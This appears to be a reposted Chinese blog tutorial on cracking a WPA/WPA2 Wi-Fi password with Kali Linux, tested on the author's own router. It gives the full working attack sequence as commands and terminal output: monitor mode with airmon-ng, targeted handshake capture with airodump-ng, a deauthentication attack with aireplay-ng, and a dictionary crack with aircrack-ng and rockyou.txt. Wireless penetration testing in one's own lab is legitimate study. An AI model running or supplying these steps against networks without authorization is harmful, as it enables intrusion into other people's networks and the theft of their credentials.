碼上快樂

相關內容    簡體    繁體

無線網絡密碼破解初體驗

本文轉載自   查看原文   2021-04-12 20:34   245    網絡安全

實驗准備

准備一台路由器、可以設置為混雜模式的無線網卡和kali linux

本次實驗破解的WiFi基本信息如下:

獲取當前環境Wi-Fi

1. 查看當前無線網卡工作模式

iwconfig wlan0

如:

┌──(shelmean㉿kali)-[~]
└─$ iwconfig wlan0
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

2. 設置網卡為混雜模式

設置為混雜模式(Monitor)時會提示需要kill掉一些干擾進程,使用 airmon-ng check kill 可以kill掉干擾進程

sudo airmon-ng start wlan0

如下,設置為混雜模式后 wlan0 變成了 wlan0mon

┌──(shelmean㉿kali)-[~]
└─$ sudo airmon-ng start wlan0
[sudo] shelmean 的密碼:

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

  PID Name
  411 NetworkManager
  576 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           mt76x2u         MediaTek Inc. MT7612U 802.11a/b/g/n/ac
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

┌──(shelmean㉿kali)-[~]
└─$ ifconfig
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8  bytes 400 (400.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8  bytes 400 (400.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0 wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 8C-88-2B-10-04-16-30-30-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 1821  bytes 574539 (561.0 KiB)
        RX errors 0  dropped 1821  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


┌──(shelmean㉿kali)-[~]
└─$ iwconfig wlan0mon
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

3. kill掉干擾進程

┌──(shelmean㉿kali)-[~]
└─$ sudo airmon-ng check kill 

Killing these processes:

  PID Name
  576 wpa_supplicant

4. 掃描附近 Wi-Fi

sudo airodump-ng wlan0mon

抓取四次握手報文

1. 指定抓取指定無線網絡的報文

sudo airodump-ng -c 6 --bssid 24:6F:8C:80:16:60 -w mercury.cap wlan0mon

測試 Wi-Fi 為 ABC-Mercury-2.4G,掃描出來看到 BSSID 為 24:6F:8C:80:16:60 信道為 6

抓取的報文保存為 mercury.cap

目前有兩個Station連接在上面,其中 9C:28:F7:9A:1B:14 為我自己的手機Mac

2. 將station踢下線

為了抓取四次握手報文,新開一個terminal,使用 aireplay-ng 攻擊工具將 station 踢下線

aireplay-ng -0 5 -a 24:6F:8C:80:16:60 -c 9C:28:F7:9A:1B:14  wlan0mon

 然后等手機重連,可以看到抓取到了握手報文

3. 跑字典

rockyou.txt 為字典文件

aircrack-ng -w rockyou.txt -b 24:6F:8C:80:16:60 mercury.cap-01.cap

 短短幾分鍾就找到我們路由器的密碼了

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 破解無線網絡密碼-BT3如何使用3 無線網絡wifi (WPA/WPA2)密碼破解方法 手把手教你如何破解無線網絡密碼(蹭網教程) Final——無線網絡密碼破解——WPA/WPA2 跑PIN碼破解無線網絡WIFI密碼的原理分析(轉) 無線網絡類型總結 在Linux上配置無線網絡 無線網絡滲透總結 Archlinux 添加無線網絡 淺談無線網絡優化
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM